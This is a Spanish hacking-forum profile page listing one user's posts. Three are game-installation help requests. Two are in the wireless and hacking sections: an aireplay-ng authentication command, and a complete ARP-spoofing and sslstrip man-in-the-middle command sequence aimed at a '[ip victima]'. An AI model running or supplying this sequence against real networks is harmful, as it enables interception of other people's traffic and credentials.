elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking Wireless / Re: [Problema]Al poner la essid en aireplay no autentifico en: 3 Marzo 2012, 10:48 am
prueba esto a ver que tal,
# iwconfig mon0 rate 1M
# aireplay-ng -1 0 -e xxx -a MAC ac -h my mac mon0

saludos
2  Seguridad Informática / Hacking / Re: Problemas Sslstrip en: 18 Febrero 2010, 20:22 pm
saludos, te pego el codigo con el que yo funciono y he auditado mi red, a mi me funciona de maravilla

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
nmap 192.168.1.1-254

..... en otra shell .....

arpspoof -i [interfaz] -t [ip victima] [ip router]

..... en otra shell......

python sslstrip.py -l 10000

.... en otra shell....

ettercap -T -q -i [interfaz]


espero haberte ayudado y si te ha ido bien, comenta


saludos

3  Media / Juegos y Consolas / ayuda mohaa sperhead en: 25 Marzo 2004, 10:43 am
bueno vereis, me he bajado ya un monton de veces esta expansion para mohaa, y mi problema es que al instalarlo me dice que no puede encontrar el archivo medal of honor allied assault spearhead_code.exe, ya he intentado casi de todo y comentaros que la version que me he descargado (la ultima) es la que viene en esta pagina en la sección de elinks, por favor si alguien supiera como poder ayudarme se lo agradeceria, ah, tambien comentaros que la version del mohaa que me he descargado es de esta pagina tambien, y que utilizo win xp (pudiera ser por esto)


saludos y gracias anticipadas
4  Media / Juegos y Consolas / Re:Una duda con Medal Honor alliend assault breakthrough en: 15 Marzo 2004, 20:27 pm
bueno pues yo tengo otro problemilla con las dos expansiones del mohaa, breakthrough y spearhead, y es que cando comienza la instalacion me salta una ventana diciendome: "cd code mfc aplicattion ha cometido un error y debe cerrarse", acto seguido le doy a aceptar y se me cierra el install, ya he probado a bajarme diferentes imagenes y no he conseguido respuesta alguna en diversos foros, alguno de ustedes podira ayudarme?

gracias


saludos
5  Media / Juegos y Consolas / ayuda instalar mohaa breakthrough en: 26 Febrero 2004, 09:40 am
tengo un problema, me baje la dos expansiones de este maravilloso juego, pero cual es mi sorpresa, que cuando me pongo a instalarlos no puedo, ya que en la segunda pantalla del instalador me dice que ha ocurrido un error con el fichero code.exe, le doy a aceptar y me sale otra ventanita de que el cdkey es incorrecto (como va a ser incorrecto si todavia no me ha preguntado cual es), le doy aceptar y se me cierra el instalador. alguien de ustedes podria echarme una mano, se lo agradeceria

saludos


gracias anticipadas
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines